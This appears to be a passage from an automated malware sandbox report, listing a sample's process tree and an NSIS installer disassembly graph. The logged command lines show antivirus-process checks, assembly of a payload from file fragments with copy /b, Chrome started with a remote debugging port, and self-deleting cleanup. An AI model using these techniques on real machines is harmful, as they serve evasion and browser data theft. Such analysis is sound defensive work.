                                                                                                                                                                                                                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                                                              Start time:15:39:47
                                                                                                                                                                                                                                                              Start date:31/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:tasklist
                                                                                                                                                                                                                                                              Imagebase:0x680000
                                                                                                                                                                                                                                                              File size:79'360 bytes
                                                                                                                                                                                                                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                                                              Start time:15:39:47
                                                                                                                                                                                                                                                              Start date:31/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                                                                                                              Imagebase:0x980000
                                                                                                                                                                                                                                                              File size:29'696 bytes
                                                                                                                                                                                                                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                                                              Start time:15:39:47
                                                                                                                                                                                                                                                              Start date:31/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:cmd /c md 208639
                                                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                                                                              Start time:15:39:47
                                                                                                                                                                                                                                                              Start date:31/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:extrac32 /Y /E Dodge
                                                                                                                                                                                                                                                              Imagebase:0x750000
                                                                                                                                                                                                                                                              File size:29'184 bytes
                                                                                                                                                                                                                                                              MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                                                                              Start time:15:39:48
                                                                                                                                                                                                                                                              Start date:31/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:findstr /V "Borough" Architecture
                                                                                                                                                                                                                                                              Imagebase:0x980000
                                                                                                                                                                                                                                                              File size:29'696 bytes
                                                                                                                                                                                                                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                                                                              Start time:15:39:48
                                                                                                                                                                                                                                                              Start date:31/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:cmd /c copy /b 208639\Rip.com + Preparing + Functional + Sends + Petroleum + Root + Exhibitions + Sexuality + State + Bridal + Cartoons 208639\Rip.com
                                                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                                                              Start time:15:39:48
                                                                                                                                                                                                                                                              Start date:31/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:cmd /c copy /b ..\Vienna + ..\Winston + ..\Assumptions + ..\Interactive + ..\Keith + ..\Anaheim + ..\Kuwait + ..\Jackson d
                                                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                                                                              Start time:15:39:48
                                                                                                                                                                                                                                                              Start date:31/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:Rip.com d
                                                                                                                                                                                                                                                              Imagebase:0xf00000
                                                                                                                                                                                                                                                              File size:947'288 bytes
                                                                                                                                                                                                                                                              MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                                                                              Start time:15:39:48
                                                                                                                                                                                                                                                              Start date:31/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:choice /d y /t 5
                                                                                                                                                                                                                                                              Imagebase:0x3b0000
                                                                                                                                                                                                                                                              File size:28'160 bytes
                                                                                                                                                                                                                                                              MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                                                                                              Start time:15:40:15
                                                                                                                                                                                                                                                              Start date:31/12/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                              Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                                                                              Start time:15:40:16
                                                                                                                                                                                                                                                              Start date:31/12/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 --field-trial-handle=2248,i,8807016753924455708,494945956636832541,262144 /prefetch:8
                                                                                                                                                                                                                                                              Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:20
                                                                                                                                                                                                                                                              Start time:15:40:47
                                                                                                                                                                                                                                                              Start date:31/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com" & rd /s /q "C:\ProgramData\8ycbs" & exit
                                                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                                                                                              Start time:15:40:47
                                                                                                                                                                                                                                                              Start date:31/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                                                                                              Start time:15:40:47
                                                                                                                                                                                                                                                              Start date:31/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:timeout /t 10
                                                                                                                                                                                                                                                              Imagebase:0xab0000
                                                                                                                                                                                                                                                              File size:25'088 bytes
                                                                                                                                                                                                                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                Execution Coverage:17.8%
                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                Signature Coverage:20.6%
                                                                                                                                                                                                                                                                Total number of Nodes:1523
                                                                                                                                                                                                                                                                Total number of Limit Nodes:35
                                                                                                                                                                                                                                                                execution_graph 4339 402fc0 4340 401446 18 API calls 4339->4340 4341 402fc7 4340->4341 4342 403017 4341->4342 4343 40300a 4341->4343 4346 401a13 4341->4346 4344 406805 18 API calls 4342->4344 4345 401446 18 API calls 4343->4345 4344->4346 4345->4346 4347 4023c1 4348 40145c 18 API calls 4347->4348 4349 4023c8 4348->4349 4352 40726a 4349->4352 4355 406ed2 CreateFileW 4352->4355 4356 406f04 4355->4356 4357 406f1e ReadFile 4355->4357 4358 4062a3 11 API calls 4356->4358 4359 4023d6 4357->4359 4362 406f84 4357->4362 4358->4359 4360 4071e3 CloseHandle 4360->4359 4361 406f9b ReadFile lstrcpynA lstrcmpA 4361->4362 4363 406fe2 SetFilePointer ReadFile 4361->4363 4362->4359 4362->4360 4362->4361 4366 406fdd 4362->4366 4363->4360 4364 4070a8 ReadFile 4363->4364 4365 407138 4364->4365 4365->4364 4365->4366 4367 40715f SetFilePointer GlobalAlloc ReadFile 4365->4367 4366->4360 4368 4071a3 4367->4368 4369 4071bf lstrcpynW GlobalFree 4367->4369 4368->4368 4368->4369 4369->4360 4370 401cc3 4371 40145c 18 API calls 4370->4371 4372 401cca lstrlenW 4371->4372 4373 4030dc 4372->4373 4374 4030e3 4373->4374 4376 405f51 wsprintfW 4373->4376 4376->4374 4391 401c46 4392 40145c 18 API calls 4391->4392 4393 401c4c 4392->4393 4394 4062a3 11 API calls 4393->4394 4395 401c59 4394->4395 4396 406c9b 81 API calls 4395->4396 4397 401c64 4396->4397 4398 403049 4399 401446 18 API calls 4398->4399 4402 403050 4399->4402 4400 406805 18 API calls 4401 401a13 4400->4401 4402->4400 4402->4401 4403 40204a 4404 401446 18 API calls 4403->4404 4405 402051 IsWindow 4404->4405 4406 4018d3 4405->4406 4407 40324c 4408 403277 4407->4408 4409 40325e SetTimer 4407->4409 4410 4032cc 4408->4410 4411 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4408->4411 4409->4408 4411->4410 4412 4048cc 4413 4048f1 4412->4413 4414 4048da 4412->4414 4416 4048ff IsWindowVisible 4413->4416 4420 404916 4413->4420 4415 4048e0 4414->4415 4430 40495a 4414->4430 4417 403daf SendMessageW 4415->4417 4419 40490c 4416->4419 4416->4430 4421 4048ea 4417->4421 4418 404960 CallWindowProcW 4418->4421 4431 40484e SendMessageW 4419->4431 4420->4418 4436 406009 lstrcpynW 4420->4436 4424 404945 4437 405f51 wsprintfW 4424->4437 4426 40494c 4427 40141d 80 API calls 4426->4427 4428 404953 4427->4428 4438 406009 lstrcpynW 4428->4438 4430->4418 4432 404871 GetMessagePos ScreenToClient SendMessageW 4431->4432 4433 4048ab SendMessageW 4431->4433 4434 4048a3 4432->4434 4435 4048a8 4432->4435 4433->4434 4434->4420 4435->4433 4436->4424 4437->4426 4438->4430 4439 4022cc 4440 40145c 18 API calls 4439->4440 4441 4022d3 4440->4441 4442 4062d5 2 API calls 4441->4442 4443 4022d9 4442->4443 4444 4022e8 4443->4444 4448 405f51 wsprintfW 4443->4448 4447 4030e3 4444->4447 4449 405f51 wsprintfW 4444->4449 4448->4444 4449->4447 4218 4050cd 4219 405295 4218->4219 4220 4050ee GetDlgItem GetDlgItem GetDlgItem 4218->4220 4221 4052c6 4219->4221 4222 40529e GetDlgItem CreateThread CloseHandle 4219->4222 4268 403d98 SendMessageW 4220->4268 4224 4052f4 4221->4224 4226 4052e0 ShowWindow ShowWindow 4221->4226 4227 405316 4221->4227 4222->4221 4271 405047 83 API calls 4222->4271 4228 405352 4224->4228 4229 4052fd 4224->4229 4225 405162 4239 406805 18 API calls 4225->4239 4270 403d98 SendMessageW 4226->4270 4233 403dca 8 API calls 4227->4233 4228->4227 4234 40535d SendMessageW 4228->4234 4231 405305 4229->4231 4232 40532b ShowWindow 4229->4232 4235 403d18 SendMessageW 4231->4235 4237 40534b 4232->4237 4238 40533d 4232->4238 4236 40528e 4233->4236 4234->4236 4241 405376 CreatePopupMenu 4234->4241 4235->4227 4240 403d18 SendMessageW 4237->4240 4242 404f72 25 API calls 4238->4242 4243 405181 4239->4243 4240->4228 4244 406805 18 API calls 4241->4244 4242->4237 4245 4062a3 11 API calls 4243->4245 4247 405386 AppendMenuW 4244->4247 4246 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4245->4246 4248 4051f3 4246->4248 4249 4051d7 SendMessageW SendMessageW 4246->4249 4250 405399 GetWindowRect 4247->4250 4251 4053ac 4247->4251 4252 405206 4248->4252 4253 4051f8 SendMessageW 4248->4253 4249->4248 4254 4053b3 TrackPopupMenu 4250->4254 4251->4254 4255 403d3f 19 API calls 4252->4255 4253->4252 4254->4236 4256 4053d1 4254->4256 4257 405216 4255->4257 4258 4053ed SendMessageW 4256->4258 4259 405253 GetDlgItem SendMessageW 4257->4259 4260 40521f ShowWindow 4257->4260 4258->4258 4261 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4258->4261 4259->4236 4264 405276 SendMessageW SendMessageW 4259->4264 4262 405242 4260->4262 4263 405235 ShowWindow 4260->4263 4265 40542f SendMessageW 4261->4265 4269 403d98 SendMessageW 4262->4269 4263->4262 4264->4236 4265->4265 4266 40545a GlobalUnlock SetClipboardData CloseClipboard 4265->4266 4266->4236 4268->4225 4269->4259 4270->4224 4450 4030cf 4451 40145c 18 API calls 4450->4451 4452 4030d6 4451->4452 4454 4030dc 4452->4454 4457 4063ac GlobalAlloc lstrlenW 4452->4457 4455 4030e3 4454->4455 4484 405f51 wsprintfW 4454->4484 4458 4063e2 4457->4458 4459 406434 4457->4459 4460 40640f GetVersionExW 4458->4460 4485 40602b CharUpperW 4458->4485 4459->4454 4460->4459 4461 40643e 4460->4461 4462 406464 LoadLibraryA 4461->4462 4463 40644d 4461->4463 4462->4459 4466 406482 GetProcAddress GetProcAddress GetProcAddress 4462->4466 4463->4459 4465 406585 GlobalFree 4463->4465 4467 40659b LoadLibraryA 4465->4467 4468 4066dd FreeLibrary 4465->4468 4471 4064aa 4466->4471 4474 4065f5 4466->4474 4467->4459 4470 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4467->4470 4468->4459 4469 406651 FreeLibrary 4478 40662a 4469->4478 4470->4474 4472 4064ce FreeLibrary GlobalFree 4471->4472 4471->4474 4480 4064ea 4471->4480 4472->4459 4473 4066ea 4476 4066ef CloseHandle FreeLibrary 4473->4476 4474->4469 4474->4478 4475 4064fc lstrcpyW OpenProcess 4477 40654f CloseHandle CharUpperW lstrcmpW 4475->4477 4475->4480 4479 406704 CloseHandle 4476->4479 4477->4474 4477->4480 4478->4473 4481 406685 lstrcmpW 4478->4481 4482 4066b6 CloseHandle 4478->4482 4483 4066d4 CloseHandle 4478->4483 4479->4476 4480->4465 4480->4475 4480->4477 4481->4478 4481->4479 4482->4478 4483->4468 4484->4455 4485->4458 4486 407752 4490 407344 4486->4490 4487 407c6d 4488 4073c2 GlobalFree 4489 4073cb GlobalAlloc 4488->4489 4489->4487 4489->4490 4490->4487 4490->4488 4490->4489 4490->4490 4491 407443 GlobalAlloc 4490->4491 4492 40743a GlobalFree 4490->4492 4491->4487 4491->4490 4492->4491 4493 401dd3 4494 401446 18 API calls 4493->4494 4495 401dda 4494->4495 4496 401446 18 API calls 4495->4496 4497 4018d3 4496->4497 4505 402e55 4506 40145c 18 API calls 4505->4506 4507 402e63 4506->4507 4508 402e79 4507->4508 4509 40145c 18 API calls 4507->4509 4510 405e30 2 API calls 4508->4510 4509->4508 4511 402e7f 4510->4511 4535 405e50 GetFileAttributesW CreateFileW 4511->4535 4513 402e8c 4514 402f35 4513->4514 4515 402e98 GlobalAlloc 4513->4515 4518 4062a3 11 API calls 4514->4518 4516 402eb1 4515->4516 4517 402f2c CloseHandle 4515->4517 4536 403368 SetFilePointer 4516->4536 4517->4514 4520 402f45 4518->4520 4522 402f50 DeleteFileW 4520->4522 4523 402f63 4520->4523 4521 402eb7 4525 403336 ReadFile 4521->4525 4522->4523 4537 401435 4523->4537 4526 402ec0 GlobalAlloc 4525->4526 4527 402ed0 4526->4527 4528 402f04 WriteFile GlobalFree 4526->4528 4529 40337f 37 API calls 4527->4529 4530 40337f 37 API calls 4528->4530 4534 402edd 4529->4534 4531 402f29 4530->4531 4531->4517 4533 402efb GlobalFree 4533->4528 4534->4533 4535->4513 4536->4521 4538 404f72 25 API calls 4537->4538 4539 401443 4538->4539 4540 401cd5 4541 401446 18 API calls 4540->4541 4542 401cdd 4541->4542 4543 401446 18 API calls 4542->4543 4544 401ce8 4543->4544 4545 40145c 18 API calls 4544->4545 4546 401cf1 4545->4546 4547 401d07 lstrlenW 4546->4547 4548 401d43 4546->4548 4549 401d11 4547->4549 4549->4548 4553 406009 lstrcpynW 4549->4553 4551 401d2c 4551->4548 4552 401d39 lstrlenW 4551->4552 4552->4548 4553->4551 4554 403cd6 4555 403ce1 4554->4555 4556 403ce5 4555->4556 4557 403ce8 GlobalAlloc 4555->4557 4557->4556 4558 402cd7 4559 401446 18 API calls 4558->4559 4562 402c64 4559->4562 4560 402d99 4561 402d17 ReadFile 4561->4562 4562->4558 4562->4560 4562->4561 4563 402dd8 4564 402ddf 4563->4564 4565 4030e3 4563->4565 4566 402de5 FindClose 4564->4566 4566->4565 4567 401d5c 4568 40145c 18 API calls 4567->4568 4569 401d63 4568->4569 4570 40145c 18 API calls 4569->4570 4571 401d6c 4570->4571 4572 401d73 lstrcmpiW 4571->4572 4573 401d86 lstrcmpW 4571->4573 4574 401d79 4572->4574 4573->4574 4575 401c99 4573->4575 4574->4573 4574->4575 4277 407c5f 4278 407344 4277->4278 4279 4073c2 GlobalFree 4278->4279 4280 4073cb GlobalAlloc 4278->4280 4281 407c6d 4278->4281 4282 407443 GlobalAlloc 4278->4282 4283 40743a GlobalFree 4278->4283 4279->4280 4280->4278 4280->4281 4282->4278 4282->4281 4283->4282 4576 404363 4577 404373 4576->4577 4578 40439c 4576->4578 4580 403d3f 19 API calls 4577->4580 4579 403dca 8 API calls 4578->4579 4581 4043a8 4579->4581 4582 404380 SetDlgItemTextW 4580->4582 4582->4578 4583 4027e3 4584 4027e9 4583->4584 4585 4027f2 4584->4585 4586 402836 4584->4586 4599 401553 4585->4599 4587 40145c 18 API calls 4586->4587 4589 40283d 4587->4589 4591 4062a3 11 API calls 4589->4591 4590 4027f9 4592 40145c 18 API calls 4590->4592 4597 401a13 4590->4597 4593 40284d 4591->4593 4594 40280a RegDeleteValueW 4592->4594 4603 40149d RegOpenKeyExW 4593->4603 4595 4062a3 11 API calls 4594->4595 4598 40282a RegCloseKey 4595->4598 4598->4597 4600 401563 4599->4600 4601 40145c 18 API calls 4600->4601 4602 401589 RegOpenKeyExW 4601->4602 4602->4590 4609 401515 4603->4609 4611 4014c9 4603->4611 4604 4014ef RegEnumKeyW 4605 401501 RegCloseKey 4604->4605 4604->4611 4606 4062fc 3 API calls 4605->4606 4608 401511 4606->4608 4607 401526 RegCloseKey 4607->4609 4608->4609 4612 401541 RegDeleteKeyW 4608->4612 4609->4597 4610 40149d 3 API calls 4610->4611 4611->4604 4611->4605 4611->4607 4611->4610 4612->4609 4613 403f64 4614 403f90 4613->4614 4615 403f74 4613->4615 4617 403fc3 4614->4617 4618 403f96 SHGetPathFromIDListW 4614->4618 4624 405c84 GetDlgItemTextW 4615->4624 4620 403fad SendMessageW 4618->4620 4621 403fa6 4618->4621 4619 403f81 SendMessageW 4619->4614 4620->4617 4622 40141d 80 API calls 4621->4622 4622->4620 4624->4619 4625 402ae4 4626 402aeb 4625->4626 4627 4030e3 4625->4627 4628 402af2 CloseHandle 4626->4628 4628->4627 4629 402065 4630 401446 18 API calls 4629->4630 4631 40206d 4630->4631 4632 401446 18 API calls 4631->4632 4633 402076 GetDlgItem 4632->4633 4634 4030dc 4633->4634 4635 4030e3 4634->4635 4637 405f51 wsprintfW 4634->4637 4637->4635 4638 402665 4639 40145c 18 API calls 4638->4639 4640 40266b 4639->4640 4641 40145c 18 API calls 4640->4641 4642 402674 4641->4642 4643 40145c 18 API calls 4642->4643 4644 40267d 4643->4644 4645 4062a3 11 API calls 4644->4645 4646 40268c 4645->4646 4647 4062d5 2 API calls 4646->4647 4648 402695 4647->4648 4649 4026a6 lstrlenW lstrlenW 4648->4649 4650 404f72 25 API calls 4648->4650 4653 4030e3 4648->4653 4651 404f72 25 API calls 4649->4651 4650->4648 4652 4026e8 SHFileOperationW 4651->4652 4652->4648 4652->4653 4661 401c69 4662 40145c 18 API calls 4661->4662 4663 401c70 4662->4663 4664 4062a3 11 API calls 4663->4664 4665 401c80 4664->4665 4666 405ca0 MessageBoxIndirectW 4665->4666 4667 401a13 4666->4667 4675 402f6e 4676 402f72 4675->4676 4677 402fae 4675->4677 4678 4062a3 11 API calls 4676->4678 4679 40145c 18 API calls 4677->4679 4680 402f7d 4678->4680 4685 402f9d 4679->4685 4681 4062a3 11 API calls 4680->4681 4682 402f90 4681->4682 4683 402fa2 4682->4683 4684 402f98 4682->4684 4687 4060e7 9 API calls 4683->4687 4686 403e74 5 API calls 4684->4686 4686->4685 4687->4685 4688 4023f0 4689 402403 4688->4689 4690 4024da 4688->4690 4691 40145c 18 API calls 4689->4691 4692 404f72 25 API calls 4690->4692 4693 40240a 4691->4693 4698 4024f1 4692->4698 4694 40145c 18 API calls 4693->4694 4695 402413 4694->4695 4696 402429 LoadLibraryExW 4695->4696 4697 40241b GetModuleHandleW 4695->4697 4699 40243e 4696->4699 4700 4024ce 4696->4700 4697->4696 4697->4699 4712 406365 GlobalAlloc WideCharToMultiByte 4699->4712 4701 404f72 25 API calls 4700->4701 4701->4690 4703 402449 4704 40248c 4703->4704 4705 40244f 4703->4705 4706 404f72 25 API calls 4704->4706 4708 401435 25 API calls 4705->4708 4710 40245f 4705->4710 4707 402496 4706->4707 4709 4062a3 11 API calls 4707->4709 4708->4710 4709->4710 4710->4698 4711 4024c0 FreeLibrary 4710->4711 4711->4698 4713 406390 GetProcAddress 4712->4713 4714 40639d GlobalFree 4712->4714 4713->4714 4714->4703 4715 402df3 4716 402dfa 4715->4716 4718 4019ec 4715->4718 4717 402e07 FindNextFileW 4716->4717 4717->4718 4719 402e16 4717->4719 4721 406009 lstrcpynW 4719->4721 4721->4718 4073 402175 4074 401446 18 API calls 4073->4074 4075 40217c 4074->4075 4076 401446 18 API calls 4075->4076 4077 402186 4076->4077 4078 4062a3 11 API calls 4077->4078 4082 402197 4077->4082 4078->4082 4079 4021aa EnableWindow 4081 4030e3 4079->4081 4080 40219f ShowWindow 4080->4081 4082->4079 4082->4080 4729 404077 4730 404081 4729->4730 4731 404084 lstrcpynW lstrlenW 4729->4731 4730->4731 4099 405479 4100 405491 4099->4100 4101 4055cd 4099->4101 4100->4101 4102 40549d 4100->4102 4103 40561e 4101->4103 4104 4055de GetDlgItem GetDlgItem 4101->4104 4105 4054a8 SetWindowPos 4102->4105 4106 4054bb 4102->4106 4108 405678 4103->4108 4116 40139d 80 API calls 4103->4116 4107 403d3f 19 API calls 4104->4107 4105->4106 4110 4054c0 ShowWindow 4106->4110 4111 4054d8 4106->4111 4112 405608 SetClassLongW 4107->4112 4109 403daf SendMessageW 4108->4109 4129 4055c8 4108->4129 4139 40568a 4109->4139 4110->4111 4113 4054e0 DestroyWindow 4111->4113 4114 4054fa 4111->4114 4115 40141d 80 API calls 4112->4115 4168 4058dc 4113->4168 4117 405510 4114->4117 4118 4054ff SetWindowLongW 4114->4118 4115->4103 4119 405650 4116->4119 4122 4055b9 4117->4122 4123 40551c GetDlgItem 4117->4123 4118->4129 4119->4108 4124 405654 SendMessageW 4119->4124 4120 40141d 80 API calls 4120->4139 4121 4058de DestroyWindow EndDialog 4121->4168 4178 403dca 4122->4178 4127 40554c 4123->4127 4128 40552f SendMessageW IsWindowEnabled 4123->4128 4124->4129 4126 40590d ShowWindow 4126->4129 4131 405559 4127->4131 4132 4055a0 SendMessageW 4127->4132 4133 40556c 4127->4133 4142 405551 4127->4142 4128->4127 4128->4129 4130 406805 18 API calls 4130->4139 4131->4132 4131->4142 4132->4122 4136 405574 4133->4136 4137 405589 4133->4137 4135 403d3f 19 API calls 4135->4139 4140 40141d 80 API calls 4136->4140 4141 40141d 80 API calls 4137->4141 4138 405587 4138->4122 4139->4120 4139->4121 4139->4129 4139->4130 4139->4135 4159 40581e DestroyWindow 4139->4159 4169 403d3f 4139->4169 4140->4142 4143 405590 